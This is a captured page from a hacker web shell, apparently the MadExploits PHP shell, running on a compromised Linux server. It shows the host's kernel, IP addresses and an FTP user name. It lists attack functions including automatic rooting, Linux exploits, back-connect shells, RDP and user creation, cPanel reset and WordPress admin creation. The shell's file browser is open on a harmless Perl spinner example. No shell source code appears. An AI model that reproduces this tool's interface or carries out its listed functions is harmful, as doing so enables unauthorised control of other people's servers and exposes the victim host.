Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
perl-Term-Spinner-Color /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
AllFramesDemo.pm
734
B
-rw-r--r--
Examples.pm
1.12
KB
-rw-r--r--
test-spinner.sh
111
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Examples.pm
#!/usr/bin/env perl package Term::Spinner::Color::Examples; use 5.010.001; use lib "../lib"; use Term::Spinner::Color; use Time::HiRes qw( sleep ); use utf8; sub main { my $s0 = Term::Spinner::Color->new('colorcycle' => 1, 'seq' => 'uni_circle'); $s0->run_ok("sleep 5", "doot circle"); my $s1 = Term::Spinner::Color->new( 'color' => 'yellow', 'seq' => [qw(dooot odoot oodot ooodt ooood ooodt oodot odoot)], ); $s1->run_ok( ["sleep 0.2", "sleep 0.2", "sleep 0.2", "sleep 0.2", "sleep 0.2", "sleep 0.2", "0"], "doot doot oh no!" ); my $s2 = Term::Spinner::Color->new('colorcycle' => 1, 'seq' => 'uni_dots'); $s2->run_ok("sleep 5", "single doot"); my $s3 = Term::Spinner::Color->new(); $s3->run_ok("sleep 5", "default doot"); my $s4 = Term::Spinner::Color->new( 'color' => 'magenta', 'seq' => 'uni_trigram_bounce' ); $s4->run_ok("sleep 5", "trigram_bounce"); my $s5 = Term::Spinner::Color->new('color' => 'green', 'seq' => 'uni_dots7'); $s5->run_ok("sleep 5", "uni_dots7"); $s5->run_ok([ "sleep 2", "2" ], "Meh"); } exit main(\@ARGV); sub meh_maker { sleep 3; return 2; }
Close